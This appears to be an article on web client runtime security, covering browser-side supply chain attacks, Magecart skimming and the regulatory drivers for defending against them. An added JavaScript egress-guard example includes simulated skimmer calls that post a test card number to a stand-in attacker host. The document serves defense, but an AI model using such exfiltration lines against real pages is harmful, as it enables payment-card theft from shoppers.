There has been a recent increase in specific types of cybersecurity breaches, data leaks, and supply chain attacks, all linked to compromises that begin at runtime in users’ web browsers. Traditional cybersecurity controls lack the visibility and reach to detect, prevent, and respond to such incidents.
The term Web Client Runtime Security (WCRS)1 was coined by the authors to describe the security, or possible malicious behavior, of the code executed in users’ browsers during their web interactions. While that code is served to users via the websites they visit, not all of it is written by the websites’ owners or even hosted on the website. Much of it comes from third parties and is hosted and served dynamically at runtime from digital supply chain parties, which in turn load fourth- and fifth-party code of their own. The website owner therefore has little control over, and no direct means to assert the integrity of, code owned and maintained by those parties: Subresource Integrity can pin a script whose content is fixed, but it cannot be applied to scripts that change with each release or vary per user agent, and it does nothing for the further scripts those scripts load.
The 2024 Polyfill.io supply chain attack, in which a trusted third-party script was replaced with a malicious one, may have affected more than 100,000 websites by some estimates.2 It is just one of the latest incidents involving exploitation at runtime in consumer web browsers. Cisco,3 Everlast,4 and many other organizations5 have also had WCRS-related cybersecurity incidents in recent years. These add to earlier, significant Magecart-style attacks,6 which skimmed payment card data at prominent organizations such as British Airways, Ticketmaster, and many others.7 WCRS-related breaches are not limited to adversarial attacks. They can also result from the unintended transfer of sensitive or regulated data to third parties, typically through analytics or tracking scripts. The recent incidents at Kaiser Permanente8 and the United States Department of Education9 are examples of such inadvertent breaches.
This preliminary article in a three-part series on WCRS introduces the concept to readers, emphasizes the importance of prioritizing WCRS in cybersecurity programs beyond traditional application security measures, and examines the risk and compliance drivers for implementing and operationalizing WCRS mechanisms.
The Need for Special Attention to WCRS
Web application security is not a new discipline. The Open Worldwide Application Security Project (OWASP) Top 10,10 the premier web application security awareness project for more than 20 years, demonstrates that organizations paid attention to web application security long before many of the modern web application threats were known or anticipated.
However, historically the security industry has focused primarily on the server side of web applications rather than the client (browser) side at runtime. The nascent nature of WCRS is also evidenced by the fact that OWASP's work11 on this topic appears to have only started in 202212 and remains an incubator project.
Traditional client-side vulnerabilities, such as cross-site scripting (XSS) and cross-site request forgery (CSRF), were typically mitigated with server-side code changes implemented by, or at the behest of, the hosting organization. Only in recent years has client-side runtime security started gaining prominence. The main reason is that browsers have become progressively more function-rich, and websites increasingly rely on downstream sources (third or nth parties) for significant amounts of code that is loaded dynamically from those sources at runtime rather than shipped with the site’s own code.
It would also not be technically or operationally feasible for website owners to use traditional application security tests such as static application security testing (SAST)13 or dynamic application security testing (DAST)14 to ensure that code provided by third parties, or by parties further downstream (nth parties), is not malicious: SAST needs the source at build time, and DAST exercises a snapshot of the application, whereas nth-party code is resolved only when the browser loads it and can change between one request and the next. Part 2 of this series examines in detail why these and other traditional web application security tools and approaches are ineffective at mitigating WCRS risk.
Organizations must, therefore, rely on a newer set of WCRS approaches or technology solutions that monitor the behavior of all code served by their websites and executed by the browser at runtime (i.e., during users’ interactions with the websites).
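One way such runtime monitoring works is to install a small guard in the page, before any third-party script runs, that wraps the browser APIs a skimmer would use to send data out and checks each destination against the site’s allowlist. The following is an added example written for this edited version, not code from the authors or from any WCRS product; the page origin, allowlist and the fake `window` object used to run it under Node.js are constructed for the demonstration.

```javascript
// Added example, not from the article: a minimal runtime egress monitor of the
// kind a WCRS control installs in the page before any third-party script runs.
// It wraps the browser APIs a skimmer typically uses to exfiltrate data (fetch,
// XMLHttpRequest.prototype.open, navigator.sendBeacon), records every call, and
// blocks calls whose destination origin is not on the site's allowlist.
// `win` is passed in instead of using the global window so the same code can run
// against the constructed fake window in runDemo() under Node.js.
function installEgressGuard(win, allowedOrigins, { block = true } = {}) {
  const allowed = new Set(allowedOrigins);
  const events = [];
  const baseHref = win.location.href;

  // Resolve the target the way the browser would (relative URLs included) and decide.
  function check(api, url) {
    let origin;
    try { origin = new URL(String(url), baseHref).origin; } catch (e) { origin = "invalid"; }
    const ok = allowed.has(origin);
    events.push({ api, url: String(url), origin, allowed: ok });
    if (!ok && block) throw new Error(`WCRS policy: ${api} to ${origin} blocked`);
    return ok;
  }

  const origFetch = win.fetch;
  win.fetch = function (input, init) {
    const url = input && typeof input === "object" && "url" in input ? input.url : String(input);
    check("fetch", url);
    return origFetch.call(this, input, init);
  };

  if (win.XMLHttpRequest) {
    const origOpen = win.XMLHttpRequest.prototype.open;
    win.XMLHttpRequest.prototype.open = function (method, url, ...rest) {
      check("XMLHttpRequest.open", url);
      return origOpen.call(this, method, url, ...rest);
    };
  }

  if (win.navigator && typeof win.navigator.sendBeacon === "function") {
    const origBeacon = win.navigator.sendBeacon;
    win.navigator.sendBeacon = function (url, data) {
      check("navigator.sendBeacon", url);
      return origBeacon.call(this, url, data);
    };
  }

  return { events };
}

// Constructed scenario: a checkout page whose first-party code talks to the shop's
// own origins while a compromised third-party script tries to post the card number
// to an attacker-controlled collector. All hostnames are made up for this example.
function runDemo() {
  const delivered = []; // what actually left the (fake) browser
  const fakeWindow = {
    location: { href: "https://shop.example.test/checkout" },
    fetch(input) { delivered.push(String(input)); return Promise.resolve({ ok: true }); },
    navigator: { sendBeacon(url) { delivered.push(url); return true; } },
    XMLHttpRequest: class { open(method, url) { delivered.push(url); } send() {} },
  };
  const guard = installEgressGuard(fakeWindow, [
    "https://shop.example.test",
    "https://api.shop.example.test",
  ]);

  const attempt = (fn) => { try { fn(); return "sent"; } catch (e) { return "blocked"; } };
  const results = [
    attempt(() => fakeWindow.fetch("/api/cart")),                                            // first party, relative URL
    attempt(() => fakeWindow.navigator.sendBeacon("https://api.shop.example.test/metrics", "ok")), // allowlisted origin
    attempt(() => fakeWindow.fetch("https://collect.attacker.test/?c=" + encodeURIComponent("4111111111111111"))), // skimmer
    attempt(() => new fakeWindow.XMLHttpRequest().open("POST", "https://collect.attacker.test/x")),                  // skimmer
  ];
  return { results, events: guard.events, delivered };
}
```

Two caveats apply in a real page. First, the guard only sees the sinks it wraps: a script that runs afterwards can still obtain a pristine `fetch` from a freshly created iframe, open a WebSocket, submit a form, or load an `<img>` or CSS resource, so a production monitor must be installed first and cover many more sinks than shown here. Second, because of that, the monitor is a detection-in-depth control and should be paired with a Content Security Policy (`connect-src`, `img-src`, `form-action`) with reporting enabled, which the browser enforces regardless of what any script does.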
Risk and Compliance Drivers
WCRS must be a focus for any website that processes sensitive information or any information that might be of value to adversaries. As such, WCRS should be top of mind for most industries when protecting themselves against reputational or financial risk in the event of a data breach.
WCRS is also relevant in the context of various security or privacy laws and regulations.
PCI DSS
Perhaps the earliest and most notable WCRS compromises, the Magecart-style attacks, were designed to skim payment card data on ecommerce websites. Given the frequency and severity of these attacks, it is no surprise that the Payment Card Industry (PCI) Security Standards Council was the first to issue specific mandates focused on WCRS.
Figure 1 reproduces requirements 6.4.3 and 11.6.1 of the PCI Data Security Standard (DSS) v4.0.1, two future-dated requirements that become mandatory on 31 March 2025. In brief, 6.4.3 requires that every script loaded and executed in the consumer’s browser on a payment page be authorized, integrity-assured, and listed in an inventory with a written justification for its presence. Requirement 11.6.1 requires a change- and tamper-detection mechanism that alerts personnel to unauthorized modification (additions, deletions, changes, and indicators of compromise) of the security-impacting HTTP headers and the script contents of payment pages as received by the consumer browser, evaluated at least once every seven days or at a frequency set by the entity’s targeted risk analysis.
Figure 1—PCI DSS v4 Requirements 6.4.3 and 11.6.115
The PCI DSS Sub-requirements appearing above have been extracted from the Payment Card Industry (PCI) Data Security Standard, v4.0.1 and appear courtesy of PCI Security Standards Council, LLC. © 2006-2024 PCI Security Standards Council, LLC. All Rights Reserved.
HIPAA Security and Privacy Rules
The US Health Insurance Portability and Accountability Act (HIPAA) regulates several aspects of the healthcare industry. While the HIPAA Security, Privacy, and Breach Notification Rules do not contain prescriptive WCRS requirements, the US Department of Health and Human Services’ Office for Civil Rights (OCR) has drawn attention to the WCRS issue through guidance bulletins.
The guidance bulletin issued on 26 June 2024 highlights “the obligations of [HIPAA Regulated Entities] under the [HIPAA Rules] when using online tracking technologies.”16 In the bulletin, the OCR stresses that “Regulated entities are not permitted to use tracking technologies in a manner that would result in impermissible disclosures of protected health information (PHI) to tracking technology vendors or any other violations of the HIPAA Rules. While it has always been true that regulated entities may not impermissibly disclose PHI to tracking technology vendors, because of the proliferation of tracking technologies collecting sensitive information, OCR is providing this reminder that it is critical for regulated entities to ensure that they disclose PHI only as expressly permitted or required by the HIPAA Privacy Rule.”17
The OCR bulletin underscores the increasing challenge of preventing PHI data leaks to online tracking solution providers and the critical need for regulated entities to ensure that PHI is disclosed only in strict accordance with the HIPAA Privacy Rule.
FTC Health Breach Notification Rule
The United States Federal Trade Commission (FTC) is the regulator for the Health Breach Notification Rule,18 which has been in effect since 2009 and applies to organizations that are not covered by the HIPAA Breach Notification Rule. The regulation covers vendors of personal health records (PHRs) and their third-party service providers.
The FTC also issued an amendment to the rule that went into effect on 29 July 2024.19 The amendment clarifies that the regulation also applies to organizations that collect user health information through products such as fitness trackers and wellness apps (e.g., for diet, diabetes, or blood pressure monitoring). Section I.B, Enforcement History, of the amendment includes two examples of FTC enforcement actions from 2023 that relate to WCRS, GoodRx and Easy Healthcare.
It should also be noted that the FTC and HHS OCR issued joint guidance in 2023 regarding online tracking technologies in websites and mobile apps,20 reinforcing the need for healthcare and wellness organizations to pay attention to unauthorized disclosure of sensitive information, whether malicious or inadvertent, resulting from scripts or tracking technologies (such as tracking pixels and cookies) at runtime.
Gramm-Leach-Bliley Act
The Gramm-Leach-Bliley Act21 is a United States federal law first enacted in 1999. It mandates requirements for financial institutions regarding the protection of non-public personal information. The law is enforced by federal financial regulators, the FTC, and state insurance authorities. The FTC recently amended its Standards for Safeguarding Customer Information rule, with the amendments effective 10 January 2022.22 While regulators have not issued specific mandates concerning WCRS, the broad definition of non-public personal information means that safeguarding it reasonably extends to the scripts running on financial institutions’ customer-facing websites.
Section 5 of the FTC Act
In addition to the Health Breach Notification Rule and the Gramm-Leach-Bliley Act, the FTC has enforcement power under a law that is broad in scope and would almost certainly cover breaches resulting from WCRS-related exploits. Section 5 of the FTC Act, Unfair or Deceptive Acts or Practices, applies to all persons and organizations engaged in commerce regardless of industry.23 In light of the FTC’s policy statement on deception,24 it is reasonable to assume that an organization suffering a WCRS-related breach may be found in violation of the FTC Act, since most organizations’ website privacy policies or statements assert that necessary security safeguards have been implemented, including on their websites.
Section 5 of the FTC Act is particularly noteworthy because the FTC can enforce it over and above enforcement initiated by other federal or state-level regulators for the same incident, resulting in additional regulatory penalties. A good example is the FTC’s CVS Caremark enforcement in 2009.25 In that case the organization, a HIPAA-regulated entity, settled FTC charges and at the same time paid a separate HIPAA settlement for the same breach.
FFIEC IT Examination Handbook
The Federal Financial Institutions Examination Council (FFIEC) is a federal interagency body of five banking regulators in the United States. The FFIEC publishes and maintains an IT Examination Handbook, which includes booklets on various topics such as information security.26 The handbook sets out the principles and practices that banking examiners assess.
While the Handbook does not mention WCRS specifically, the Information Security booklet27 contains the overarching requirements related to web application security. The most relevant to WCRS among them would be “Protect web or Internet-facing applications through additional controls, including web application firewalls, regular scanning for new or recurring vulnerabilities, mitigation or remediation of common security weaknesses, and network segregation to limit inappropriate access or connections to the application or other areas of the network.”28
GDPR and Similar Privacy Laws
The EU General Data Protection Regulation (GDPR)29 took effect in May 2018, establishing requirements for the processing and protection of personal data belonging to EU residents.
As it relates to WCRS, the GDPR’s Article 5(1)(f) requires that personal data shall be “processed in a manner that ensures appropriate security of the personal data, including protection against unauthorized or unlawful processing and against accidental loss, destruction or damage, using appropriate technical or organizational measures (‘integrity and confidentiality’).” 30
It is important to note that an effective WCRS implementation might have helped British Airways detect the 2018 Magecart compromise that led to its GDPR enforcement31 in 2020. In its penalty notice, the UK Information Commissioner’s Office (ICO) states “The failures are especially serious in circumstances where it is unclear whether or when BA itself would ever have detected the breach. BA was only alerted to the exfiltration of personal data from its website by a third-party.”32 Cybersecurity leaders under the purview of GDPR must act with prudence and consider implementing robust WCRS solutions to proactively detect and mitigate client-side threats.
The GDPR is not unique in requiring the implementation of appropriate safeguards, even if it does not include or prescribe WCRS safeguards. Similar regulations worldwide mandate the implementation of reasonable or appropriate safeguards.
US State-Level Regulations
In addition to the previously discussed US federal laws and regulations, most US states have their own mandates for privacy, protection of personal data, and breach notification requirements for their residents’ data. This includes newer regulations that are focused on the protection of consumer health data. Some examples include the State of Washington’s My Health My Data Act,33 the State of Connecticut’s Substitute Bill No. 3,34 and the State of Nevada’s SB370.35
Conclusion
WCRS should be a key consideration for any organization that runs websites that process sensitive or regulated data due to the demonstrable security and privacy risk discussed in this article. Beyond the risk of non-compliance that might result in severe regulatory enforcement, organizations may also need to consider the possible business risk from class-action lawsuits, and the risk to their brand or reputation.
The next part of this series will cover implementation options that organizations may consider for building effective WCRS capabilities.
Endnotes
1 This term is coined by the authors.
2 Censys Research Team, “Polyfill.io Supply Chain Attack – Digging into the Web of Compromised Domains,” Censys, 2 July 2024
3 Lyons, J.; “Cisco merch shoppers stung in Magecart attack,” MSN, 6 September 2024
4 Naprys, E.; “Everlast Hacked, Customer Credit Cards Compromised,” Cybernews, 15 November 2023
5 Montalbano, E.; “WordPress Supply Chain Attack Spreads Across Multiple Plug-ins,” Dark Reading, 25 June 2024
6 Sansec Forensics Team, “What Is Magecart?,” Sansec, 8 April 2024
7 CISOMAG, “Researcher Says British Airways Hack Caused by the Same Group That Pwned Ticketmaster,” 17 September 2018
8 Kaiser Permanente, “Important Notice About a Privacy Matter,” 6 May 2024
9 Lecher, C.; “Department of Education Sued Following Markup Investigation Into FAFSA Data Shared with Facebook,” The Markup, 26 July 2024
10 Van der Stock, A.; “OWASP Top 10,” PowerPoint Presentation
11 OWASP, “OWASP Top 10 Client-Side Security Risks”
12 Google Groups, Candidate OWASP Top 10 Client-Side Security Risks
13 OWASP, “DevSecOps Guideline – v-0.2 — Static Code Analysis”
14 OWASP, “DevSecOps Guideline – v-0.2 —Dynamic Application Security Testing (DAST)”
15 PCI Security Standards Council, PCI DSS v4.0.1
16 United States Department of Health and Human Services, “Use of Online Tracking Technologies by HIPAA Covered Entities and Business Associates,” USA
17 United States Department of Health and Human Services, Use of Online Tracking Technologies by HIPAA Covered Entities and Business Associates
18 National Archives Code of Federal Regulations, Part 318—HEALTH BREACH NOTIFICATION RULE, 30 May 2024
19 National Archives Federal Register, Health Breach Notification Rule (Amendment), USA, 30 May 2024
20 Federal Trade Commission (FTC), “FTC and HHS Warn Hospital Systems and Telehealth Providers About Privacy and Security Risks from Online Tracking Technologies,” 20 July 2023
21 Gramm-Leach-Bliley Act, Pub. L. No. 106-102, 113 Stat. 1338
22 Federal Register, Standards for Safeguarding Customer Information, 9 December 2021
23 FTC, Federal Trade Commission Act Section 5: Unfair or Deceptive Acts or Practices, USA
24 FTC, “FTC Policy Statement on Deception,” 14 October 1983, USA
25 FTC, “CVS Caremark Settles FTC Charges: Failed to Protect Medical and Financial Privacy of Customers and Employees; CVS Pharmacy Also Pays $2.25 Million to Settle Allegations of HIPAA Violations,” USA, 18 February 2009
26 Federal Financial Institutions Examinations Council (FFIEC) IT Examination Infobase, “IT Booklets,” USA
27 FFIEC Information Technology, FFIEC Information Technology Examination Handbook–Information Security, September 2016, USA
28 FFIEC Information Technology, FFIEC Information Technology Examination Handbook–Information Security
29 Eur-lex.europa.eu, Regulation (EU) 2016/679 of the European Parliament and of the Council of 27 April 2016 on the protection of natural persons with regard to the processing of personal data and on the free movement of such data, and repealing Directive 95/46/EC (General Data Protection Regulation [or GDPR]) (OJ L 119, 4.5.2016, p. 1), Article 16, European Union, 27 April 2016
30 Legislation.gov.uk, Regulation (EU) 2016/679 of the European Parliament and of the Council, United Kingdom, 27 March 2016
31 Bannister, A.; “British Airways Agrees to Pay Victims of Record-Breaking Data Breach,” The Daily Swig, 7 July 2021
32 Information Commissioner’s Office, Penalty Notice for British Airways 2018 Breach, 16 October 2020
33 Washington State Office of the Attorney General, “Protecting Washingtonians’ Personal Health Data and Privacy,” USA
34 State of Connecticut Substitute, Substitute S. 3, 2024, USA
35 Nevada Legislature, S. 370, 2023, USA
Sergei Vasilevsky, CISSP
Is the founder and president of ILIAM Consulting. Vasilevsky has over 20 years of cybersecurity consulting experience, beginning at a Big 4 for 7 years. ILIAM Consulting provides customized cybersecurity and compliance solutions related to application security architecture, vulnerability management, identity and access management, and regulatory compliance. Its work spans multiple industries, including finance, healthcare, and aviation. You can reach Sergei at http://www.linkedin.com/in/sergeivasilevsky/
Kamal Govindaswamy, CCSP, CISSP, CIPP/US
Is the co-founder and security practice leader at Tueoris. Govindaswamy has been a security consultant for over 20 years, beginning at a Big 4 for 6 years. He has served clients across not-for-profit, healthcare, retail, financial services, life sciences, insurance, and consumer business industries. You can reach Kamal at http://www.linkedin.com/in/kgswamy/